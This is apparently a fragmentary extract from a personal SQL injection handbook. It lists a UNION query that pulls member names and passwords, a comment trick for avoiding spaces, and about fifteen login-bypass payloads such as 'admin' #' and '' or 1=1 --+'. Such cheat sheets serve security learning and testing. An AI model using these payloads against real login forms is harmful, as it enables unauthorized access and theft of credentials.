Handbook For SQL and SQL Injection PART1 1658256349
Handbook For SQL and SQL Injection PART1 1658256349
SQL INJECTION
Kunal Singh
25th September 2021
https://github.com/ks1912
https://www.linkedin.com/in/ks1912
https://ks1912.github.io/portfolio
Introduction
1. What is SQL?
2. What is SQL Injection?
3. SQL Injection Cheat Sheet
4. References.
SELECT/*avoid-spaces*/password/**/FROM/**/Members
● MySQL If Statement
IF(condition,true-part,false-part)
SELECT IF(1=1,'true','false')
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM
members
● Login ByPass
○ admin’ #
○ admin” #
○ admin’)) #
○ ‘ or 1=1 --+
○ ‘ or 1=1 #
○ " or " ""
○ " or true --
○ " or true --+
○ ‘)) or true -- -
○ admin' or 1=1 or ''='
○ admin') or ('1'='1'--
○ admin') or '1'='1'/*
○ admin") or "1"="1
○ ') or ('1'='1 --
1. https://www.geeksforgeeks.org/sql-ddl-dml-tcl-dcl/
2. https://www.geeksforgeeks.org/sql-ddl-dql-dml-dcl-tcl-commands/
3. https://www.w3schools.com/sql/sql_injection.asp
4. https://portswigger.net/web-security/sql-injection
5. https://owasp.org/www-community/attacks/SQL_Injection
6. https://portswigger.net/web-security/sql-injection/cheat-sheet
7. https://www.sqltutorial.org/wp-content/uploads/2016/04/SQL-che
at-sheet.pdf
8. https://www.netsparker.com/blog/web-security/sql-injection-cheat
-sheet/
9. https://www.hackingloops.com/sql-injection-cheat-sheet/